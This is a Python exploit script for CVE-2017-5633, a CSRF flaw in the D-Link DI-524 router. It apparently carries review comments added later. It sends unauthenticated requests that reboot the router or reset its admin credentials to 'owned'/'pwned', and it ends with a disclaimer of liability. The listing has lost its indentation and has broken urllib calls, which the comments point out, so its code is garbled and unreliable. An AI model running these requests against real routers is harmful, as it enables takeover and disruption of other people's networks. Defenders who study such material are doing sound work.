exploitrouter524.py
# Exploit Title: Multiple CSRF in D-Link DI-524 Wireless Router
# Date: 2017-04-17
# Exploit Author: Carlos Daniel Giovanella
# Product: D-Link DI-524 Wireless
# Software Link: https://dlink.com.br/produto/di-524150
# Version: Firmware 9.01
# CVE : CVE-2017-5633
# Tested on: Windows 7, 8, 10
# Python Version: 3.4+
# Usage: py exploitrouter524.py --victim "Gateway"
import os, sys, time
import urllib.request
import json
from urllib.parse import *
def animaesseinferno():
    """Print a two-step progress banner, pausing three seconds after each step.

    Takes no arguments; the text appended to each banner is read from the
    module-level name ``alvo``, which the caller must have assigned first.
    """
    # The second banner starts with a carriage return, as in the original.
    banners = ("Exploiting... ** ", "\rExploiting... *** ")
    for prefix in banners:
        print(prefix + alvo)
        time.sleep(3)
# Command-line driver for the proof of concept described in the file header
# (CSRF in the D-Link DI-524 web interface, CVE-2017-5633).
# NOTE(review): this listing has lost its indentation, so the nesting of the
# branches below is not recoverable with certainty; comments describe each
# statement and hedge wherever the structure matters.
# Arguments read: sys.argv[1] must be "--victim", sys.argv[2] is the router
# address ("alvo" = target), sys.argv[3] selects "--reboot" or "--admin".
# A missing argument raises IndexError, handled at the bottom by printing usage.
# Defender's reading: neither request built here carries a cookie, credential
# or anti-CSRF token, so the two paths to watch and to restrict on an affected
# device are /cgi-bin/dial and /cgi-bin/pass.
try:
if sys.argv[1] == "--victim":
# --- "--reboot" mode: a single GET against /cgi-bin/dial ---
if sys.argv[3] == "--reboot":
# "cls" (and "color"/"mode" further down) are Windows console commands;
# the file header lists Windows as the tested platform.
os.system("cls")
alvo = sys.argv[2]
animaesseinferno()
# Build the request URL from the target string and echo it. Up to three
# candidate forms are assigned; which one is finally used depends on the
# lost nesting of these if/else lines.
if not "http://" in sys.argv[2]:
alvourl = ("http://"+alvo+"cgi-bin/dial?rc=@&A=H&M=0&T=2000&rd=status")
print (alvourl)
if not alvo.endswith("/"):
alvourl = ("http://"+alvo+"/cgi-bin/dial?rc=@&A=H&M=0&T=2000&rd=status")
print (alvourl)
else:
alvourl = (alvo+"/cgi-bin/dial?rc=@&A=H&M=0&T=2000&rd=status")
print (alvourl)
try:
# The action is selected by the query string alone: plain GET, no
# body, no extra headers.
acessa = urllib.request.urlopen(alvourl)
# NOTE(review): Python 3's `urllib` package has no `urlopen`
# attribute and the argument here is a response object, not a URL, so
# this line is expected to raise; only HTTPError is handled below.
# Do not treat the script's printed outcome as evidence about a
# device in either direction.
resposta = urllib.urlopen(acessa)
lerpage = resposta.read()
except urllib.error.HTTPError as err:
# HTTP 404 is reported as a wrong URL; "color c" switches the console
# text colour.
if err.code == 404:
os.system ("color c")
print ("\n\n###### Wrong url / page didn't found. #######")
time.sleep(2)
# NOTE(review): ambiguous without indentation. This `else` is either the
# try's no-exception branch or the non-404 branch of the `if` above.
else:
os.system ("color a")
print ("Sucessfull rebooted!")
print ("\n Victim :"+ alvo)
# --- "--admin" mode: a POST against /cgi-bin/pass ---
if sys.argv[3] == "--admin":
try:
os.system("cls")
alvo = sys.argv[2]
alvourl = alvo + "/cgi-bin/pass"
# Fields submitted to the password page. 'owned'/'pwned' are fixed,
# publicly known values (printed below as username and password), so a
# device that accepted this request needs its admin credentials reset.
valorespost = {'rc' : '@atxbox',
'Pa' : 'owned',
'P1' : 'pwned' }
# Two encodings of the same fields are prepared: `dados` (URL-encoded,
# then UTF-8 bytes) and `json_data` (JSON bytes). The body actually
# passed to urlopen is `json_data`; `dados` is only printed later.
dados = urllib.parse.urlencode(valorespost)
if not "http://" in sys.argv[2]:
alvourl = "http://" + alvourl
dados = dados.encode('UTF-8')
json_data = json.dumps(valorespost).encode('utf8')
# Supplying a data argument makes urlopen issue a POST.
pededado = urllib.request.urlopen(alvourl, json_data)
# NOTE(review): same non-existent `urllib.urlopen` call as in the reboot
# branch; expected to raise something other than HTTPError.
resposta = urllib.urlopen(pededado)
finalmente = resposta.read().decode('utf-8')
except urllib.error.HTTPError as err:
os.system ("color c")
print (err)
falha = 1
# NOTE(review): `falha` is assigned only in the handler above, so on a path
# where no HTTPError occurred this comparison reads an unbound name.
if falha != 1:
os.system ("color a")
print ("Sucessfully exploited!")
print ("\n Victim :"+ alvo)
print ("Username: owned")
print ("Password: pwned")
# Debug output: response body, response object, encoded form data and URL.
print (finalmente)
print (resposta)
print (dados)
print (alvourl)
# Reached when sys.argv has fewer entries than the code indexes: define the
# usage banner and show it (presumably both lines sit inside this handler;
# the indentation that would confirm it is missing).
except IndexError:
def inicio():
# Clear the console and resize it to 100 columns by 40 rows (Windows "mode").
os.system("cls")
os.system("mode 100,40")
print (' -----------------------------Made by--------------------------------------')
print (' # Carlos Daniel Giovanella (car.dangi@hotmail.com)')
print (' # ')
print (' # Facebook: www.fb.com/KiritoKirigayaKazutoKunZ')
print (' # Github: github.com/cardangi')
print (' # LinkedIn: https://www.linkedin.com/in/carlos-d-870792128/')
print (' # ')
print (' # Usage:')
print (' # exploitrouter524.py --victim gateway (default 192.168.0.1/) --admin (change admin account)')
print (' # exploitrouter524.py --victim gateway (default 192.168.0.1/) --reboot (reboot the device)')
print (' # Real example: exploitrouter524.py --victim 192.168.1.1/ --reboot')
print (' # ')
print (' # I do not take any responsibility and we are not liable for any damage caused.')
print (' -------------------------------------------------------------------------')
inicio()